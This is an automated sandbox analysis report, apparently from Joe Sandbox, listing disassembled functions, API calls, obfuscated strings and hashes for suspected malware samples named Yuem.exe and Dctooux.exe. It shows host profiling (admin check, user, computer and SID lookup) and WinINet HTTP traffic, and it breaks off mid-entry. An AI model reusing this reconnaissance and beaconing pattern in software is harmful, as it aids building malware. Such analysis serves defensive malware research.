Part of subcall function 00D00CE1: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00D00D07

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: eb043cf10c472ac80cdaaa4f1a60183011b7058ce0635138d7da5bd7722f2c85
Instruction ID: df6d75eaa763fa04e7f1339b2c1bd243f165a921b3cba7c14d6ec61b4ba3bbf6
Opcode Fuzzy Hash: eb043cf10c472ac80cdaaa4f1a60183011b7058ce0635138d7da5bd7722f2c85
Instruction Fuzzy Hash: 4FE04F35500205ABCB05FB20C4917ACBF61FF88350F548309E46A472E2CF346D46DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D1AD8B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D1AD94

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

_free.LIBCMT ref: 00D1ADA7
_free.LIBCMT ref: 00D1ADB8
_free.LIBCMT ref: 00D1ADC9

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: db25d9abe2337e56dbfe131163911ec808767d80a837440c41eb61f6d60e5748
Instruction ID: 526e55ff7c0b826afef55030646e8e0325351487294c168534633f3e51643ca6
Opcode Fuzzy Hash: db25d9abe2337e56dbfe131163911ec808767d80a837440c41eb61f6d60e5748
Instruction Fuzzy Hash: B8E012B8CA0320BB86022F56BC0D49B7B2AE706B603041416F80082332EF760892EBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A3FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Microsoft\Yuem.exe, xrefs: 00D1A43D, 00D1A47A

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Microsoft\Yuem.exe
API String ID: 0-508620602
Opcode ID: aa1e6186ebd7783a791f076197a56a27b0fa0fe183ade5b01ba3f945dda8fb36
Instruction ID: abb32b307e6836a9ec5edc826694d5369c543858ac0578257db6895896c28d4e
Opcode Fuzzy Hash: aa1e6186ebd7783a791f076197a56a27b0fa0fe183ade5b01ba3f945dda8fb36
Instruction Fuzzy Hash: 91417F71A01214BFDB21DF9DA8859EEBBB9EF85710B140066F409E7211DEB18E81DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D16AAB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D16AD0

Strings

RCC, xrefs: 00D16AEA
MOC, xrefs: 00D16AE2

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e41dd3a92bcbff210e411a83673430805a569dd97e41971104ddf0e7e0cb7964
Instruction ID: 6036aeabde3a5dec253ed26375623411726d8c2cea5d8374239dff365c6c0b12
Opcode Fuzzy Hash: e41dd3a92bcbff210e411a83673430805a569dd97e41971104ddf0e7e0cb7964
Instruction Fuzzy Hash: 02413A72900209BFCF15DF94EA81AEEBBB5FF48304F184159F914A6261DB35D990DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CFCA26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00CFCAAE
RaiseException.KERNEL32(?,?,?,?), ref: 00CFCAD3

Part of subcall function 00D14F51: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D41300,?,?,?,00D41300), ref: 00D14FB1

Part of subcall function 00D19FCF: IsProcessorFeaturePresent.KERNEL32(00000017,00D1BB0D,?,?,00D17D9A,?,?,?,?,00D189CE,?), ref: 00D19FEB

Strings

csm, xrefs: 00CFCA62

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: a0d1a07958bd81503daa1e9a77958cf6f9dabc756a5a4cba8633a93e43ec9171
Instruction ID: 7786cf6d58a50507a1ed25493d30adac96d4bbfedad1fa60cc37453ee52b5cee
Opcode Fuzzy Hash: a0d1a07958bd81503daa1e9a77958cf6f9dabc756a5a4cba8633a93e43ec9171
Instruction Fuzzy Hash: B5217131E0021CAFCF64DFA5DA959FEB7B9EF04710F144409E616AB250DA30BE45EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00D12B51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00D12BB1
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D12BFC

Strings

pContext, xrefs: 00D12BF4

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 7995297f21d166092a0c0ce8ae85caa2b255cb98410214fdf8fc881904c6e0fc
Instruction ID: f07ea39c7a93083ab43d400e8ecde6dc760bc735c04db4c5bc11f6ff0f16e6b2
Opcode Fuzzy Hash: 7995297f21d166092a0c0ce8ae85caa2b255cb98410214fdf8fc881904c6e0fc
Instruction Fuzzy Hash: 5D110336A00214ABCF15EF28E8915FD73A9EF84360B154065ED02AB386DF35ED958BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0CD7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00D0CD9E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D0CDB1

Strings

pContext, xrefs: 00D0CDA9

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 910394dfc49cb4f3ea4bb2ce532317ef81a80713d71e4653eb1380a8b05056e6
Instruction ID: 13b61c62b3bf3fb1c6696f4ad5a82134a000f3a1af6d2ad5f0111f99183ccf2a
Opcode Fuzzy Hash: 910394dfc49cb4f3ea4bb2ce532317ef81a80713d71e4653eb1380a8b05056e6
Instruction Fuzzy Hash: D3E0D139B0420C67CB00B765E805CEDB7BD9ED47107140015F519A3381DF74EA498AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0491C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D0494C

Strings

pScheduler, xrefs: 00D04944
version, xrefs: 00D04931

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: da4c5fd0622537f66f9f5e74969733a03e7d3191572e06eca88aa75812c3ba1f
Instruction ID: 40ceda6c5319b668fe0ca354bfb0625a2e78039a34f561dd711739209e119845
Opcode Fuzzy Hash: da4c5fd0622537f66f9f5e74969733a03e7d3191572e06eca88aa75812c3ba1f
Instruction Fuzzy Hash: 78E0867444020CBACB15FA54E90AFDD77A4DB20345F148035B51D160D5D7B4D6CCCEB2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Dctooux.exePID: 1456, Parent PID: 6840COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	806
Total number of Limit Nodes:	20

Executed Functions

Function 00A65E10 Relevance: 36.8, APIs: 4, Strings: 16, Instructions: 1839COMMON

Download Yara Rule

APIs

Part of subcall function 00A56A30: GetUserNameA.ADVAPI32(?,?), ref: 00A56A8A
Part of subcall function 00A56A30: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00A56AD0
Part of subcall function 00A56A30: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00A56ADD

IsUserAnAdmin.SHELL32 ref: 00A65F67
GetUserNameA.ADVAPI32(?,?), ref: 00A65FF2
GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 00A6605A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,?), ref: 00A66207

Part of subcall function 00A68CF0: __Cnd_destroy_in_situ.LIBCPMT ref: 00A68DE8
Part of subcall function 00A68CF0: __Mtx_destroy_in_situ.LIBCPMT ref: 00A68DF1

Strings

8QF6, xrefs: 00A664E2
aQT6, xrefs: 00A663AC
KwTxOF==, xrefs: 00A66499
VRx6, xrefs: 00A663FE
Vg 6, xrefs: 00A66427
VRN6, xrefs: 00A6635A
9XB6, xrefs: 00A66450
ahB6, xrefs: 00A664BB
9W26, xrefs: 00A662FD
WF6, xrefs: 00A66477
cf32db, xrefs: 00A66469
246122658369, xrefs: 00A65E7A, 00A65E8D, 00A65ECF, 00A65ED9, 00A664D4
dP=, xrefs: 00A67363, 00A67632
9BN6, xrefs: 00A66331
AB6, xrefs: 00A663D5
WAP6, xrefs: 00A66383

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Name$User$AccountAdminAuthorityCnd_destroy_in_situComputerFileIdentifierLookupModuleMtx_destroy_in_situ
String ID: AB6$ WF6$ dP=$246122658369$8QF6$9BN6$9W26$9XB6$KwTxOF==$VRN6$VRx6$Vg 6$WAP6$aQT6$ahB6$cf32db
API String ID: 2186296352-3791848333
Opcode ID: 877bec14d3a3d919ce2afde65cf30032ad6bec15e35b9df13b0c8d094eb0bd5e
Instruction ID: cd8776bcdedcb52b303e86b8356c7a0948fca79e07b5d788e2da2346d4467557
Opcode Fuzzy Hash: 877bec14d3a3d919ce2afde65cf30032ad6bec15e35b9df13b0c8d094eb0bd5e
Instruction Fuzzy Hash: D8F209B1A102548BEB19DB28CD8979DBB76AF91308F5082DCD049A72D2DB399FC4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BB00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 130
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00A5BB67
CoCreateInstance.OLE32(00AAB330,00000000,00000001,00AAB340,?), ref: 00A5BB83
CoUninitialize.OLE32 ref: 00A5BB91
CoUninitialize.OLE32 ref: 00A5BC50
CoUninitialize.OLE32 ref: 00A5BC64

Strings

, xrefs: 00A5C79A
IMPNC6==, xrefs: 00A5C49E
(, xrefs: 00A5C83B
RyYTVp==, xrefs: 00A5C7B3
AKdtLH0pPXU=, xrefs: 00A5C4C7
IMPtLH0p, xrefs: 00A5C230

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: $($AKdtLH0pPXU=$IMPNC6==$IMPtLH0p$RyYTVp==
API String ID: 1968832861-320660975
Opcode ID: 888848be3a44e5712d5b63b91966bb054107cbd85c7aada85b95eca95c419320
Instruction ID: e1adfaeb0de04bb2c895dc43429bb29ed7cb9e4a729e34f9f12211caab822ad1
Opcode Fuzzy Hash: 888848be3a44e5712d5b63b91966bb054107cbd85c7aada85b95eca95c419320
Instruction Fuzzy Hash: EF418E71A10109AFDF04CFA9CC85BAE7BB9FB49712F104518F805EB691DB74A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5CD92 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 341
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00AAADF4,00000000,00000000,00000000,00000000), ref: 00A5CDCC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A5CDF0
HttpOpenRequestA.WININET(?,00000000), ref: 00A5CE3A
HttpSendRequestA.WININET(?,00000000), ref: 00A5CEFA
InternetReadFile.WININET(?,?,000003FF,?), ref: 00A5CFAC
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00A5D060
InternetCloseHandle.WININET(?), ref: 00A5D087
InternetCloseHandle.WININET(?), ref: 00A5D08F
InternetCloseHandle.WININET(?), ref: 00A5D097

Strings

RyYTVp==, xrefs: 00A5CE13

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: RyYTVp==
API String ID: 1354133546-1708438175
Opcode ID: 6f3be2f71bbdf52a24948ebb5f1f93f9f8b9889e484a945e490ae81b58273e84
Instruction ID: 630e41ed7db49e0e90675cc2a97e8a6ac5fa0854943e49008e0cdaeac1f8b26a
Opcode Fuzzy Hash: 6f3be2f71bbdf52a24948ebb5f1f93f9f8b9889e484a945e490ae81b58273e84
Instruction Fuzzy Hash: 13C1E3B16001189BEB28CF28CD84BDD7B76FF81305F508298F909972D2DB759AC8CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00A92E9C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A92B55: CreateFileW.KERNELBASE(00000000,00000000,?,00A92F45,?,?,00000000,?,00A92F45,00000000,0000000C), ref: 00A92B72

GetLastError.KERNEL32 ref: 00A92FB0
__dosmaperr.LIBCMT ref: 00A92FB7
GetFileType.KERNELBASE(00000000), ref: 00A92FC3
GetLastError.KERNEL32 ref: 00A92FCD
__dosmaperr.LIBCMT ref: 00A92FD6
CloseHandle.KERNEL32(00000000), ref: 00A92FF6
CloseHandle.KERNEL32(00A8C072), ref: 00A93143
GetLastError.KERNEL32 ref: 00A93175
__dosmaperr.LIBCMT ref: 00A9317C

Strings

H, xrefs: 00A93101

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: fa18a6b349efa6981cd46b01de5801bb9f599da72c3a2c0dc3432c729f952998
Instruction ID: d23ed0963dcfc7078fed84b17032c9f08e7837bd3788b0aa9e1c33d663f61ec0
Opcode Fuzzy Hash: fa18a6b349efa6981cd46b01de5801bb9f599da72c3a2c0dc3432c729f952998
Instruction Fuzzy Hash: A4A10232A041059FCF19EF68DD91BAE3BF1AF46320F244259E815AF2A2DB348D12CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A58180 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,04AA336F,74DF0F00,00000000), ref: 00A581FA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A5825B
GetProcAddress.KERNEL32(00000000), ref: 00A58262
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A58323
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A58327

Strings

JdpxN6==, xrefs: 00A5861E
JdpxOF==, xrefs: 00A584D8
JdpyM6==, xrefs: 00A5857B

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: JdpxN6==$JdpxOF==$JdpyM6==
API String ID: 374719553-3012168460
Opcode ID: 5408f29ca0fe4f0a95f015672804ba7d9d8de10785526fcfe73f4fa278b87ec1
Instruction ID: c8ac9178dbbf2996990482fa39320a2d04567dadd1e78d92dc63ebd7a353d3ca
Opcode Fuzzy Hash: 5408f29ca0fe4f0a95f015672804ba7d9d8de10785526fcfe73f4fa278b87ec1
Instruction Fuzzy Hash: 4CD1D270E00644ABDB15EB78CE4739D7B71BB46725F944288EC156B2C3DF394A898BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00A56A30 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00A56A8A
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00A56AD0
GetSidIdentifierAuthority.ADVAPI32(?), ref: 00A56ADD
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A56BF1
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00A56C18

Strings

IMKsdF==, xrefs: 00A56C21
RsPlbwUp, xrefs: 00A56AEC
GMQsdF==, xrefs: 00A56B78

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Authority$Name$AccountCountIdentifierLookupUser
String ID: GMQsdF==$IMKsdF==$RsPlbwUp
API String ID: 4230999276-849562344
Opcode ID: 65dcd234b743cfaee2daa0bf07076fcbcfe384f2fc60bea067cbc9d8681095ba
Instruction ID: 62c9f809ba696ed318bc378b5755674eb762f83b3e6db711ea90d1f0674f132e
Opcode Fuzzy Hash: 65dcd234b743cfaee2daa0bf07076fcbcfe384f2fc60bea067cbc9d8681095ba
Instruction Fuzzy Hash: C391C3B1A001189BDB28DB28CD85BDDB779FB45305F8045E9E90997282DB349FC8CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A561A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

